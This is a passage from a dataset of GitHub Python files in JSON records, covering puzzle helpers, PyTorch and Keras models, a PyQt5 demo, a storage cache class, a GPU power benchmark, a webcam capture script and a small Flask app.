start_time = time()\n result = func(*args, **kwargs)\n print(f\"\\nTime required: {(time() - start_time)*1000:.2f} ms\")\n return result\n return wrapper\n\ndef to_int(str_list):\n for i, item in enumerate(str_list):\n try:\n str_list[i] = int(float(item))\n except ValueError:\n str_list[i] = item\n return str_list\n\ndef shortest_path(grid):\n y_size, x_size = len(grid),len(grid[0])\n paths = [(0,0,0)] # total, y, x\n visited = [[0] * len(row) for row in grid]\n while True:\n total, y, x = heapq.heappop(paths) # Get coordinates for lowest path\n if visited[y][x]: continue\n if (y, x) == (y_size - 1, x_size - 1):\n return total\n visited[y][x] = 1\n for ny, nx in [(y+1, x), (y, x+1), (y-1, x), (y, x-1)]: # prefer down and right\n if not x_size > ny >= 0 <= nx < y_size: continue\n if visited[ny][nx]: continue\n heapq.heappush(paths, (total + grid[ny][nx], ny, nx))\n\n\ndef string_print(grid, spacer=''):\n for line in grid:\n print(spacer.join(str(x) for x in line))\n print()\n\n\ndef print_dict(im, spacer=''): # Render image from dict with y,x coordinates\n y_min,y_max = min([a[0] for a in im.keys()]),max([a[0] for a in im.keys()])\n x_min,x_max = min([a[1] for a in im.keys()]),max([a[1] for a in im.keys()])\n\n image = [['.'] * (x_max-x_min +1) for _ in range((y_max-y_min + 1))]\n for y,x in im:\n image[y-y_min][x-x_min] = im[(y,x)]\n\n for line in image:\n print(spacer.join(str(x) for x in line))\n print()\n\ndef expanding_range(x0):\n down = count(x0, -1)\n up = count(x0 + 1)\n return chain.from_iterable(zip(down, up))\n\n\ndef expanding_range_2d(x0, y0):\n yield x0, y0\n for radius in count(1):\n for i in range(-radius, radius):\n yield x0+i, y0-radius\n yield x0+radius, y0+i\n yield x0-i, y0+radius\n yield x0-radius, y0-i\n\n\ndef expanding_manhattan_2d(x0, y0):\n yield x0, y0\n for radius in count(1):\n for i in range(radius):\n j = radius - i\n yield x0+i, y0-j\n yield x0+j, y0+i\n yield x0-i, y0+j\n yield x0-j, y0-i\n\n\n","repo_name":"aufbakanleitung/advent-of-code","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"24315250486","text":"from math import fabs, fmod, sqrt, sin, pi\n\ndef f(x):\n global a, n, v\n return a * sin(2 * pi * n * x / v)\n\ndef compute_arclength():\n x = 0\n l = 0.0\n dx = 0.0001\n while x <= v / (4 * n):\n dy = fabs(f(x) - f(x + dx))\n l += sqrt(dx * dx + dy * dy)\n x += dx\n return l\n\n\ntokens = input().split(maxsplit=2)\nwhile len(tokens) == 3:\n w, v, n = float(tokens[0]), float(tokens[1]), int(tokens[2])\n lo = 0\n hi = sqrt(w ** 2 - v ** 2) / (2 * n)\n target = w / n\n eps = 0.1\n while eps > 0.00001:\n a = (lo + hi) / 2\n l = compute_arclength() * 4\n if l >= target:\n hi = a\n else:\n lo = a\n eps = fabs(target - l)\n print(\"{:.3f}\".format(a - fmod(a, 0.001)))\n tokens = input().split(maxsplit=2)\n","repo_name":"kitihounel/competitive-programming-africa","sub_path":"south-africa/2016/scrunched.tle.py","file_name":"scrunched.tle.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"60"} +{"seq_id":"4525030869","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom modules import ConvBlock, FullyConnectedBlock\n\n\nclass CNNModel(nn.Module):\n def __init__(self):\n super(CNNModel, self).__init__()\n self.feature = nn.Sequential(\n ConvBlock(input_channel=1, output_channel=32),\n ConvBlock(input_channel=32, output_channel=64),\n ConvBlock(input_channel=64, output_channel=128),\n ConvBlock(input_channel=128, output_channel=128),\n nn.Flatten()\n )\n\n self.class_classifier = nn.Sequential(\n FullyConnectedBlock(in_features=10752, out_features=512),\n nn.Dropout(p=0.5),\n FullyConnectedBlock(in_features=512, out_features=64),\n nn.Dropout(p=0.5),\n FullyConnectedBlock(in_features=64, out_features=10)\n )\n\n def forward(self, x):\n x = self.feature(x)\n x = self.class_classifier(x)\n return x\n\n\nclass CNNModelTiny(nn.Module):\n def __init__(self):\n super(CNNModelTiny, self).__init__()\n self.conv1 = nn.Conv2d(1, 16, 3, stride=1, padding=0)\n self.bn1 = nn.BatchNorm2d(16)\n self.pool1 = nn.MaxPool2d(kernel_size=(2, 2))\n\n self.conv2 = nn.Conv2d(16, 32, 3, stride=1, padding=0)\n self.bn2 = nn.BatchNorm2d(32)\n self.pool2 = nn.MaxPool2d(kernel_size=(2, 2))\n\n self.conv3 = nn.Conv2d(32, 64, 3, stride=1, padding=0)\n self.bn3 = nn.BatchNorm2d(64)\n self.pool3 = nn.MaxPool2d(kernel_size=(2, 2))\n\n self.conv4 = nn.Conv2d(64, 64, 3, stride=1, padding=0)\n self.bn4 = nn.BatchNorm2d(64)\n self.pool4 = nn.MaxPool2d(kernel_size=(2, 2))\n\n self.flatten = nn.Flatten()\n\n self.fc1 = nn.Linear(in_features=256, out_features=64)\n self.bn6 = nn.BatchNorm1d(num_features=64)\n self.d2 = nn.Dropout(p=0.5)\n self.fc3 = nn.Linear(in_features=64, out_features=10)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.pool1(x)\n x = F.relu(x)\n x = self.conv2(x)\n x = self.bn2(x)\n x = self.pool2(x)\n x = F.relu(x)\n x = self.conv3(x)\n x = self.bn3(x)\n x = self.pool3(x)\n x = F.relu(x)\n x = self.conv4(x)\n x = self.bn4(x)\n x = self.pool4(x)\n x = F.relu(x)\n\n x = self.flatten(x)\n x = self.fc1(x)\n x = self.bn6(x)\n x = F.relu(x)\n x = self.d2(x)\n x = self.fc3(x)\n return x\n\n\ndef test():\n sample_input = torch.rand((2, 1, 65, 65))\n model = CNNModelTiny()\n y = model(sample_input)\n print(y.shape)\n\n\nif __name__ == '__main__':\n test()","repo_name":"Subrata132/key_word_spotting","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"30735685995","text":"import sys\r\n\r\nfrom PyQt5.QtWidgets import QApplication, QWidget\r\n\r\n\r\ndef set_window_size():\r\n\r\n app = QApplication(sys.argv)\r\n\r\n w = QWidget()\r\n\r\n # 设置窗口标题\r\n w.setWindowTitle(\"演示窗口\")\r\n\r\n # 窗口的大小\r\n w.resize(800, 500)\r\n\r\n # 展示窗口\r\n w.show()\r\n\r\n # 程序进行循环等待状态\r\n app.exec()\r\n\r\n\r\nif __name__ == '__main__':\r\n set_window_size()","repo_name":"Zyg8420/PyQT5","sub_path":"04 调整窗口大小.py","file_name":"04 调整窗口大小.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"34181368867","text":"import hashlib\nimport os\nfrom typing import Optional, Set, Callable, cast\n\nimport cachetools\n\nfrom ImageSaverLib.MetaDB.Errors import NotExistingException\nfrom ImageSaverLib.MetaDB.MetaDB import MetaDBInterface\nfrom ImageSaverLib.MetaDB.Types.Resource import ResourceName, ResourceSize, ResourceHash\nfrom ImageSaverLib.Storage.FileSystemStorage import FileSystemStorage2\nfrom ImageSaverLib.Storage.StorageInterface import StorageInterface, SizableStorageInterface\nfrom .LCMeta.LCMetaInterface import LCMetaInterface\nfrom .LCMeta.ResourceAlias import ResourceNameAlias\nfrom .LCMeta.db_inits import makeSQLiteMeta, makeSQLiteRamMeta\nfrom ..CacheInterface import CacheInterface\nfrom ...Errors import StorageError, DownloadError\n\n\nclass _CallbackCache(cachetools.LFUCache):\n\n def __init__(self, maxsize, getsizeof=None):\n super().__init__(maxsize, getsizeof)\n self.on_delete = None # type: Optional[Callable[[ResourceName], None]]\n\n def __delitem__(self, key, cache_delitem=cachetools.Cache.__delitem__):\n super().__delitem__(key, cache_delitem)\n if self.on_delete:\n self.on_delete(key)\n\n\nclass LocalCache(StorageInterface, CacheInterface):\n def __init__(self, meta, storage, cache_size=50, cache_dir='~/.isl/.isl_cache', ram_cache_meta=False, debug=False):\n # type: (MetaDBInterface, StorageInterface, int, str, bool, bool) -> None\n StorageInterface.__init__(self, debug)\n CacheInterface.__init__(self, storage)\n self._cache_workdir = os.path.abspath(os.path.normpath(os.path.expanduser(cache_dir)))\n self._cache_storage_workdir = os.path.join(self._cache_workdir, 'storage')\n os.makedirs(self._cache_storage_workdir, exist_ok=True)\n self._cache_meta_workdir = os.path.join(self._cache_workdir, 'cache_meta')\n os.makedirs(self._cache_meta_workdir, exist_ok=True)\n self._cache_meta_path = os.path.join(self._cache_meta_workdir, 'cache_meta.sqlite')\n self._meta = meta\n self._local_storage = FileSystemStorage2(self._cache_storage_workdir, debug=debug)\n if ram_cache_meta:\n self._cache_meta = makeSQLiteRamMeta(echo=False)\n else:\n self._cache_meta = makeSQLiteMeta(self._cache_meta_path, echo=False)\n self._cache_size = cache_size\n self._cache = _CallbackCache(self._cache_size)\n self._cache.on_delete = lambda key: self._on_delete(key)\n self._resource_names = None # type: Optional[Set[ResourceName]]\n unreferenced_resources = set(self._local_storage.listResourceNames()).difference(\n set((a for _, a in self._cache_meta.getAllResourceNamesWithAliases())))\n for r in unreferenced_resources:\n self._local_storage.deleteResource(r)\n for r, a in self._cache_meta.getAllResourceNamesWithAliases():\n self._cache[r] = a\n\n def closeCacheMeta(self):\n self._cache_meta.close()\n\n def supportsWrapType(self, wrap_type):\n return self.wrapped_storage.supportsWrapType(wrap_type)\n\n def getMaxSupportedResourceSize(self):\n return self.wrapped_storage.getMaxSupportedResourceSize()\n\n def getRequiredWrapType(self):\n return self.wrapped_storage.getRequiredWrapType()\n\n def identifier(self):\n return self.wrapped_storage.identifier()\n\n def _on_delete(self, resource_name):\n if self._cache_meta.hasAliasForResourceName(resource_name):\n alias = self._cache_meta.getAliasOfResourceName(resource_name)\n try:\n self._local_storage.deleteResource(alias)\n except StorageError:\n pass\n self._cache_meta.removeAliasOfResourceName(resource_name)\n\n def loadRessource(self, resource_name):\n try:\n if not self.cache_enabled:\n raise KeyError\n alias = self._cache[resource_name] # raises KeyError\n try:\n data = self._local_storage.loadRessource(alias)\n except DownloadError:\n raise KeyError\n resource_hash = ResourceHash(hashlib.sha256(data).digest())\n try:\n meta_resource_hash = self._meta.getResourceByResourceName(resource_name).resource_hash\n except NotExistingException:\n meta_resource_hash = b''\n if resource_hash != meta_resource_hash:\n self._cache.pop(resource_name)\n self._cache_meta.removeAliasOfResourceName(resource_name)\n self._local_storage.deleteResource(alias)\n raise KeyError\n except KeyError:\n data = self.wrapped_storage.loadRessource(resource_name)\n if self.cache_enabled:\n resource_hash = ResourceHash(hashlib.sha256(data).digest())\n alias = ResourceNameAlias(\n self._local_storage.saveResource(data, resource_hash, ResourceSize(len(data))))\n self._cache[resource_name] = alias\n self._cache_meta.addAlias(resource_name, alias, resource_hash)\n return data\n\n def saveResource(self, resource_data, resource_hash, resource_size):\n resource_name = self.wrapped_storage.saveResource(resource_data, resource_hash, resource_size)\n if self.cache_enabled:\n alias = ResourceNameAlias(self._local_storage.saveResource(resource_data, resource_hash, resource_size))\n self._cache[resource_name] = alias\n self._cache_meta.addAlias(resource_name, alias, resource_hash)\n return resource_name\n\n def deleteResource(self, resource_name):\n try:\n if self._cache_meta.hasAliasForResourceName(resource_name):\n alias = self._cache_meta.getAliasOfResourceName(resource_name)\n self._local_storage.deleteResource(alias)\n self._cache_meta.removeAliasOfResourceName(resource_name)\n self._cache.pop(resource_name)\n else:\n alias = self._cache.pop(resource_name)\n self._local_storage.deleteResource(alias)\n except KeyError:\n pass\n self.wrapped_storage.deleteResource(resource_name)\n\n def listResourceNames(self):\n return self.wrapped_storage.listResourceNames()\n\n def wipeResources(self):\n self.wrapped_storage.wipeResources()\n\n\nclass SizableLocalCache(SizableStorageInterface, LocalCache):\n\n def __init__(self, meta, storage, cache_size=50, cache_dir='~/.isl/.isl_cache', ram_cache_meta=False, debug=False):\n # type: (MetaDBInterface, SizableStorageInterface, int, str, bool, bool) -> None\n LocalCache.__init__(self, meta, storage, cache_size, cache_dir, ram_cache_meta, debug)\n self._storage = cast(SizableStorageInterface, storage)\n\n def getTotalSize(self):\n return self._storage.getTotalSize()\n\n def getCurrentSize(self):\n return self._storage.getCurrentSize()\n\n def increaseCurrentSize(self, size):\n self._storage.increaseCurrentSize(size)\n\n def resetCurrentSize(self):\n self._storage.resetCurrentSize()\n\n def calculateFullness(self, default_total_size=None):\n return self._storage.calculateFullness(default_total_size)\n\n def hasFreeSize(self, required_space):\n return self._storage.hasFreeSize(required_space)\n","repo_name":"FlorianSauer/ImageSaver","sub_path":"ImageSaverLib/Storage/Cache/LocalCache/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"3397993404","text":"import torch\n# torch.backends.cuda.matmul.allow_tf32 = True\nimport timm\nimport subprocess\n\nmodel = timm.create_model(\"vit_base_patch16_224\")\nmodel.head = torch.nn.Linear(768,1)\nbatch_size = 160\nmodel=model.to(\"cuda\") #.half()\n\ncriterion = torch.nn.BCEWithLogitsLoss()\nimages = torch.rand((batch_size,3,224,224)).to(\"cuda\") #.half()\noptimizer = torch.optim.AdamW(model.parameters(), lr=1e-5) \nfrom torch.cuda.amp import GradScaler\nfrom torch import autocast\nscaler = GradScaler()\n\nresults = []\nfor pwr in range(150,490,10):\n subprocess.run([\"nvidia-smi\",\"-pl\",str(pwr)])\n model.train()\n start = torch.cuda.Event(enable_timing=True)\n end = torch.cuda.Event(enable_timing=True)\n start.record()\n for _ in range(64):\n labels = torch.randint(0,2,(batch_size,1),dtype=torch.float32).to(\"cuda\")\n optimizer.zero_grad()\n with autocast(device_type='cuda', dtype=torch.float16):\n outputs = model.forward(images)\n loss = criterion(outputs,labels) \n\n scaler.scale(loss).backward()\n scaler.step(optimizer)\n old_scale = scaler.get_scale()\n scaler.update()\n\n # outputs = model.forward(images)\n # loss = criterion(outputs,labels)\n # loss.backward()\n # optimizer.step()\n end.record()\n torch.cuda.synchronize()\n print((pwr,start.elapsed_time(end)/64))\n results.append((pwr,start.elapsed_time(end)/64))\nprint(results)","repo_name":"qwertyforce/optimal_power_limit_for_dl","sub_path":"test_power_train.py","file_name":"test_power_train.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1694225507","text":"import cv2\nimport threading\nimport requests\nimport os\n\nBACKEND_SERVER_ENDPOINT = \"http://127.0.0.1:5000\"\n\n\ndef processFrame(frame):\n _, img_encoded = cv2.imencode('.jpg', frame)\n # response = requests.post(f'{BACKEND_SERVER_ENDPOINT}/processImage',\n # files={'image': ('image.jpg', img_encoded.tobytes())})\n # print('Response:', response.status_code, response.content)\n\n\n# Define the video source for device 1\n# video_source_1 = \"http://192.168.45.45:8080/video\" # replace with ip web cam url\nvideo_source_1 = 0 # for accessing directly from webcam\n# video_source_2 = \"http://192.168.45.45:8080/video\" # another ip web cam url\n\n# Define the frame rate for both devices\n# I feel it's better to have different framerates depending on cameras. We can make it all same if that's easier tho\nframe_rate_1 = 30\nframe_rate_2 = 30\n\n# process/save every nth frame from video stream only instead of all frames\nframe_delimiter = 20\n\n# Initialize the variables for saving frames\ncounter = 0\n\n# Define the function to save frames from both devices\n\n\ndef save_frames(video_source, frame_rate):\n global counter\n\n # Create a VideoCapture object\n capture = cv2.VideoCapture(video_source)\n\n # Check if the video source is opened\n if not capture.isOpened():\n print(\"Unable to open the video source\")\n return\n\n # Read the first frame\n _, frame = capture.read()\n\n # Set the delay based on the frame rate\n delay = int(1000 / frame_rate)\n\n while True:\n # Read frames\n _, frame = capture.read()\n\n if frame is None:\n print(\"Error in reading frame correctly\")\n break\n\n # Increment the counter\n counter += 1\n\n # Save every 20th frame to file\n if counter % frame_delimiter == 0:\n # Save the frame to the \"images\" folder (for training phase)\n if not os.path.exists(\"images\"):\n os.makedirs(\"images\")\n cv2.imwrite(\"images/frame_{}.jpg\".format(counter //\n frame_delimiter), frame)\n print(\"Writing to file, frame: \", counter // frame_delimiter)\n processFrame(frame) # for testing phase\n\n # Show the live camera feed\n cv2.imshow('frame', frame)\n\n # Quit if the key \"q\" is pressed\n if cv2.waitKey(delay) & 0xFF == ord(\"q\"):\n break\n\n\n# Create and start the threads\nthreading.Thread(target=save_frames, args=(\n video_source_1, frame_rate_1)).start()\n# threading.Thread(target=save_frames, args=(video_source_2, frame_rate_2)).start() # start thread 2 once second camera source has been added\n\n# Wait for a key press to exit\ncv2.waitKey(0)\n\n# Clean up resources\ncv2.destroyAllWindows()\n","repo_name":"adithyaanilkumar/SafeNet","sub_path":"anomaly_server/temp/multiDevice.py","file_name":"multiDevice.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"60"} +{"seq_id":"74472733312","text":"import behave\nimport os\nimport json\nfrom docs_build.tutorials_templates.data_management.modalities.scripts import Scripts\n\n\n@behave.when(u'I prepared test modalities \"{section_name}\"')\ndef step_impl(context, section_name):\n sections_list = {\n \"section1\": section1_prepare,\n \"section2\": section2_prepare,\n # \"section3\": section3_prepare, NOT RUNNABLE\n \"section4\": section4_prepare,\n # \"section5\": section5_prepare, PREPARED FROM section4\n }\n\n context.scripts = Scripts()\n sections_list[section_name](context)\n\n\ndef section1_prepare(context):\n context.scripts.project_name1 = context.project.name\n context.scripts.dataset_name1 = context.dataset.name\n\n\ndef section2_prepare(context):\n item1_path = \"sample_datasets/FruitImage/items/train/apple_1.jpg\"\n item2_path = \"sample_datasets/FruitImage/items/train/apple_2.jpg\"\n item1 = context.dataset.items.upload(local_path=os.path.join(os.environ['DATALOOP_TEST_ASSETS'], item1_path))\n item2 = context.dataset.items.upload(local_path=os.path.join(os.environ['DATALOOP_TEST_ASSETS'], item2_path))\n context.scripts.first_item_id2 = item1.id\n context.scripts.second_item_id2 = item2.id\n context.scripts.dataset2 = context.dataset\n\n\ndef section4_prepare(context):\n context.scripts.dataset4 = context.dataset\n\n modalities_json_path = \"modalities/modalities_json.json\"\n context.scripts.modalities_json4 = os.path.join(os.environ['DATALOOP_TEST_ASSETS'], modalities_json_path)\n\n\n@behave.then(u'I run test modalities \"{section_name}\"')\ndef step_impl(context, section_name):\n sections_list = {\n 'section1': context.scripts.section1,\n 'section2': context.scripts.section2,\n # 'section3': context.scripts.section3, NOT RUNNABLE\n 'section4': context.scripts.section4,\n 'section5': context.scripts.section5,\n }\n\n try:\n sections_list[section_name]()\n\n except Exception as e:\n assert False, \"Failed to run example : {}\".format(e)\n\n if section_name == 'section4':\n try:\n sections_list['section5']()\n except Exception as e:\n assert False, \"Failed to run example : {}\".format(e)\n\n\n","repo_name":"dataloop-ai/dtlpy-documentation","sub_path":"tests/features/steps/tutorials/data_management/test_modalities.py","file_name":"test_modalities.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"60"} +{"seq_id":"3175056899","text":"from neighbors_and_roc.options import Data_Defaults, Model_Defaults\nfrom neighbors_and_roc import util_ROC, fixed_settings, util_text, util_emb, my_models\n\nimport random\nimport json\nimport os\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.utils import to_categorical\nimport numpy as np\n\n# OPTIONS\nTO_WRITE = os.path.join(fixed_settings.GENERATED_DATA_ROOT, 'generation_yelplike.txt')\ndata_opts = Data_Defaults()\ndata_opts.NUM_STORIES = 10000\nprint(data_opts, \"\\n\")\nmodel_opts = Model_Defaults()\nmodel_opts.EMBEDDINGS_FILENAME = 'GoogleNews-vectors-negative300.txt'\nmodel_opts.EMBEDDINGS_FILEPATH = os.path.join(fixed_settings.EMBEDDINGS_ROOT, model_opts.EMBEDDINGS_FILENAME) if model_opts.EMBEDDINGS_FILENAME != None else None\nmodel_opts.HIDDEN_LAYERS = [100]\n# self.BATCH_SIZE = 32\nmodel_opts.EPOCHS = 100\nmodel_opts.DROPOUT = False\nmodel_opts.REGULARIZE = False\nmodel_opts.BASE_NUM_TRAINING_SAMPLES = 5000\nmodel_opts.PERCENTAGE_TO_ADD = 0\nmodel_opts.NUM_TESTING_SAMPLES = 500\n# model_opts.USING_ALTERNATIVES = True\n# model_opts = Model_Defaults() # For quick debugging only\nprint(model_opts, \"\\n\")\nassert(data_opts.NUM_STORIES >\n model_opts.BASE_NUM_TRAINING_SAMPLES + model_opts.PERCENTAGE_TO_ADD*model_opts.BASE_NUM_TRAINING_SAMPLES + model_opts.NUM_TESTING_SAMPLES)\n\n\n# DATA\nwith open(os.path.join(fixed_settings.DATA_ROOT,'yelp-10000.json'), 'r') as file:\n reviews = [json.loads(line) for line in file]\nstars_to_simple_responses = {}\nstars_to_simple_responses[5]=['I am impressed!', 'I will be back.']\nstars_to_simple_responses[4]=['I am impressed!', 'I will be back.']\nstars_to_simple_responses[2]=['Not impressed.', 'Will not be back.']\nstars_to_simple_responses[1]=['Not impressed.', 'Will not be back.']\nX_sentences = []\nY_sentences = []\nY_alternative_sentences = []\nfor review in reviews:\n curr_sentences = util_text.get_sentences(review['text'])\n sentence = curr_sentences[min(1, len(curr_sentences) - 1)]\n sentence = ' '.join(sentence.split())\n stars = review['stars']\n if sentence is not '' and stars in stars_to_simple_responses:\n X_sentences.append(sentence)\n r = random.randint(0,1)\n Y_sentences.append(stars_to_simple_responses[stars][r])\n Y_alternative_sentences.append(stars_to_simple_responses[stars][1-r])\nprint('\\n\\n'.join(['\\n'.join(t) for t in zip(X_sentences, Y_sentences, Y_alternative_sentences)]), file=open(TO_WRITE, 'w'))\n#region data preparation\n# prepare the tokenizer on the source text #TODO see what can be moved out of this file\nin_tokenizer = Tokenizer()\nin_tokenizer.fit_on_texts(X_sentences)\nin_index_to_word = {index: word for (word, index) in in_tokenizer.word_index.items()}\n# determine the vocabulary size\nin_vocab_size = len(in_tokenizer.word_index) + 1 # Because tokenizer does not assign 0\nprint('Vocabulary Size: %d' % in_vocab_size)\n# Convert from text to sequences\nin_sequences = in_tokenizer.texts_to_sequences(X_sentences)\n# pad input sequences\nin_max_sentence_length = max([len(seq) for seq in in_sequences])\nin_sequences = pad_sequences(in_sequences, maxlen=in_max_sentence_length, padding='pre')\nprint('Max Sequence Length: %d' % in_max_sentence_length)\n# split into input and output elements\n\n# prepare the tokenizer on the source text #TODO see what can be moved out of this file\nout_tokenizer = Tokenizer()\nout_tokenizer.fit_on_texts(Y_sentences+Y_alternative_sentences)\nout_index_to_word = {index: word for (word, index) in out_tokenizer.word_index.items()}\n# determine the vocabulary size\nout_vocab_size = len(out_tokenizer.word_index) + 1 # Because tokenizer does not assign 0\nprint('Vocabulary Size: %d' % out_vocab_size)\n# Convert from text to sequences\nY_sequences = out_tokenizer.texts_to_sequences(Y_sentences)\nY_alternative_sequences = out_tokenizer.texts_to_sequences(Y_alternative_sentences)\n# pad input sequences\nout_max_sentence_length = max([len(seq) for seq in Y_sequences]+[len(seq) for seq in Y_alternative_sequences])\nY_sequences = pad_sequences(Y_sequences, maxlen=out_max_sentence_length, padding='post')\nY_alternative_sequences = pad_sequences(Y_alternative_sequences, maxlen=out_max_sentence_length, padding='post')\nprint('Max Sequence Length: %d' % out_max_sentence_length)\n\n\ndata = np.hstack((in_sequences[:, :], Y_sequences[:, :], Y_alternative_sequences[:,:]))\n# x y1 y2\n# x y1 y2\n# ...\n# np.random.shuffle(data)\n\nX = data[:,:-2*out_max_sentence_length]\nY = data[:,-2*out_max_sentence_length:-1*out_max_sentence_length]\nY_alternatives = data[:,-1*out_max_sentence_length:]\nprint(X.shape)\n# print([[in_index_to_word[i] for i in row if i!=0] for row in X]) # HELPFUL FOR DEBUGGING\n#endregion\nbasic_training_data = (X[:model_opts.BASE_NUM_TRAINING_SAMPLES],\n Y[:model_opts.BASE_NUM_TRAINING_SAMPLES])\nNUM_SAMPLES_TO_ADD = int(model_opts.BASE_NUM_TRAINING_SAMPLES * model_opts.PERCENTAGE_TO_ADD)\nfresh_training_data = (X[model_opts.BASE_NUM_TRAINING_SAMPLES:model_opts.BASE_NUM_TRAINING_SAMPLES + NUM_SAMPLES_TO_ADD],\n Y[model_opts.BASE_NUM_TRAINING_SAMPLES:model_opts.BASE_NUM_TRAINING_SAMPLES + NUM_SAMPLES_TO_ADD])\nalternative_training_data = (X[:NUM_SAMPLES_TO_ADD],\n Y_alternatives[:NUM_SAMPLES_TO_ADD])\ntesting_data = (X[len(X) - model_opts.NUM_TESTING_SAMPLES:],\n Y[len(X) - model_opts.NUM_TESTING_SAMPLES:] + Y_alternatives[len(X) - model_opts.NUM_TESTING_SAMPLES:])\n\n\n# GET EMBEDDINGS\nif model_opts.EMBEDDINGS_FILENAME:\n print(\"Retrieving embeddings...\")\n in_embedding_matrix = util_emb.get_embedding_matrix(\n embedding_size=model_opts.EMBEDDING_SIZE, embedding_path=model_opts.EMBEDDINGS_FILEPATH, vocab_size=in_vocab_size, word_to_index=in_tokenizer.word_index)\n out_embedding_matrix = util_emb.get_embedding_matrix(\n embedding_size=model_opts.EMBEDDING_SIZE, embedding_path=model_opts.EMBEDDINGS_FILEPATH, vocab_size=out_vocab_size, word_to_index=out_tokenizer.word_index)\n\n# TRAIN WITH DATA ADDED\nadditional_training_data = alternative_training_data if model_opts.USING_ALTERNATIVES else fresh_training_data\nprint(\"Building model...\")\nif model_opts.EMBEDDINGS_FILENAME:\n training_model,encoder_model,decoder_model = my_models.seq2seq_model_with_embs(input_length=X.shape[1], output_length=Y.shape[1],\n in_embedding_matrix=in_embedding_matrix, out_embedding_matrix=out_embedding_matrix,\n hidden_layers=model_opts.HIDDEN_LAYERS, dropout=model_opts.DROPOUT, regularize=model_opts.REGULARIZE)\nelse: # Random embedding, mostly for debugging\n training_model, encoder_model, decoder_model = my_models.seq2seq_model_with_embs(input_length=X.shape[1], output_length=Y.shape[1],\n in_embedding_matrix_shape=(in_vocab_size, model_opts.EMBEDDING_SIZE),\n out_embedding_matrix_shape=(out_vocab_size, model_opts.EMBEDDING_SIZE),\n hidden_layers=model_opts.HIDDEN_LAYERS, dropout=model_opts.DROPOUT, regularize=model_opts.REGULARIZE)\ntraining_model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\nprint(\"Training model...\")\nencoder_input_data = np.vstack((basic_training_data[0], additional_training_data[0]))\ndecoder_target_data = np.vstack((basic_training_data[1], additional_training_data[1]))\ntab = np.asarray([0]*decoder_target_data.shape[0]).reshape(decoder_target_data.shape[0],1)\ndecoder_input_data = np.hstack((tab, decoder_target_data[:,:-1])) # Target data slid over\ntraining_model.fit([encoder_input_data, decoder_input_data], to_categorical(decoder_target_data),\n epochs=model_opts.EPOCHS, batch_size=model_opts.BATCH_SIZE, verbose=2)\nprint(\"Evaluating model...\")\n# Note that model.evaluate() is intentionally not used here because it will only mark 1 (the first) of the 2 valid answers correct\nnum_correct = 0\nfor i in range(model_opts.NUM_TESTING_SAMPLES):\n x,y = testing_data[0][i,:].reshape((1,testing_data[0].shape[1])), testing_data[1][i,:].reshape((1,testing_data[1].shape[1]))\n generated = my_models.decode_sequence(x, Y.shape[1], encoder_model, decoder_model, out_tokenizer.word_index, out_index_to_word)\n print(generated)\n# prediction = model.predict_classes(x)[0]\n# if y[0,prediction] == 1: print('\\nCorrect:'); num_correct += 1\n# else: print('\\nWrong')\n# choice_num = 0\n# for start in range(0,x.shape[1],max_sentence_length):\n# predicted_flag = ''\n# gold_star_flag = ''\n# if start != 0:\n# if choice_num == prediction: predicted_flag = '>'\n# if y[0,choice_num] == 1: gold_star_flag = '*'\n# choice_num += 1\n# print(gold_star_flag+predicted_flag+\n# ' '.join([index_to_word[i] for i in x[0,start:start+max_sentence_length] if i!=0])) # HELPFUL FOR DEBUGGING\n# print('\\n{correct}/{all}={perc:.2%}'.format(correct=num_correct, all=model_opts.NUM_TESTING_SAMPLES,\n# perc=num_correct/model_opts.NUM_TESTING_SAMPLES))\n\n","repo_name":"pkalluri/neighbors-and-roc","sub_path":"scripts/generation_yelplike_dataset_learn.py","file_name":"generation_yelplike_dataset_learn.py","file_ext":"py","file_size_in_byte":9365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"26806400238","text":"\nfrom flask import Flask, render_template\nimport psycopg2\n\napp=Flask(__name__)\ntry:\n conn = psycopg2.connect(\"dbname='myduka' user='postgres' host='localhost'port='5433' password='12345'\")\n print(\"Database Connected Successfully\")\nexcept Exception as e:\n print (\"I am unable to connect to the database\", e)\n\n@app.route(\"/\")\ndef home():\n username = \"VIVI K\"\n return render_template(\"index.html\", username=username)\n\n@app.route(\"/products\")\ndef products():\n\n products = [\n (1,\"omo\",40,50,100),\n (2,\"bread\",50,60,200),\n (3,\"milk\",60,65,150)\n \n ]\ncur = conn.cursor()\ncur.execute(\"\"\"my-duka\"\"\")\nrows = cur.fetchall()\nprint(rows)\n\n\n #\n #for i in products:\n #total = total + i[3]\n\n # return render_template(\"products.html\", products=products)\napp.run()\n","repo_name":"VIVIAN-WANJIRU/my-duka-project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"24813379394","text":"from progress.bar import IncrementalBar\nfrom pymongo import MongoClient\nimport os, json, re, html, time\nimport pycountry, pickle, datetime\nimport yaml\n\ndictfilt = lambda x, y: dict([ (i,x[i]) for i in x if i in set(y) 